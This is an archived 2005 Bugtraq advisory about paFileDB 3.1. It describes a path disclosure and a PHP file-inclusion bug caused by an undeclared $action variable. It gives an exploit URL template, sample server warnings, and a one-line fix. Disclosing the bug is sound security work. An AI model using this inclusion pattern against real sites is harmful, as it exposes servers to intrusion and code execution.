lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050131070130.2579.qmail@www.securityfocus.com>
Date: 31 Jan 2005 07:01:30 -0000
From: Pedram hayati <pi3ch@...oo.com>
To: bugtraq@...urityfocus.com
Subject: [PersianHacker.net] Full Path Disclosure and PHP Injection In
    Pafiledb 3.1 Final




In the name of GOD

[Persianhacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final

PafileDB 
paFileDB is designed to allow webmasters have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and delete the files too. No more messing with a bunch of HTML pages for a file database on your site! Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is one of the best and easiest ways to manage files!
More info @:
http://www.phparena.net/pafiledb.php


Discussion: 
--------------------
What is the bug ?
There is a Full Path Disclosure vulnerability in Pafiledb 3.1 which ends to disclosure of page local location on the web server.There is nother bug which let`s h4cK3r inject php codes and run them on server.

Where is the bug ?
At line 25 of pafiledb.php :

[
if ($login == "do") { include "./includes/$action/login.php"; exit; }
]

as we see $action is used in above statement and it`s not declared yet so h4ck3r can use it for PHP Injection attacks by passing his malicouse string from URL .


Exploit:
--------------------
[
http://www.example.com/pafiledb.php?login=do&action=[value]
]

which includes PHP codes in :

[
./includes/[value]/login.php
]

and if PHP page doesn`t realy exist at that address , server returns warring page like this :

[

Warning: main(./includes/value/login.php): failed to open stream: No such file or directory in /home/host/public_html/downloads/pafiledb.php on line 25

Warning: main(./includes/value/login.php): failed to open stream: No such file or directory in /home/host/public_html/downloads/pafiledb.php on line 25

Warning: main(): Failed opening './includes/value/login.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/host/public_html/downloads/pafiledb.php on line 25

]

and this message shows local address of pafiledb.php on server.


Solution:
--------------------
just remove line 25 of pafiledb.php ,there is no need for that line ( I wonder why coder ever used that ? ). 


Credit:
--------------------
Discovered by PersianHacker.NET Security Team 
by devil_box (d3vilbox  yahoo  com) 
http://www.PersianHacker.NET 

special thanks to : Pi3cH , Herbod , Amectris , IDEspinner and all guys in PersianHacker.net


Help
--------------------
Path Disclosure Article (Farsi Language):
http://www.persianhacker.net/articles/article-2208.html

More Help:
visit: http://www.PersianHacker.NET
or mail me @: d3vilbox  yahoo  com


Note
--------------------
Script authors not contacted.
PS : sorry for my bad english

good luck


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ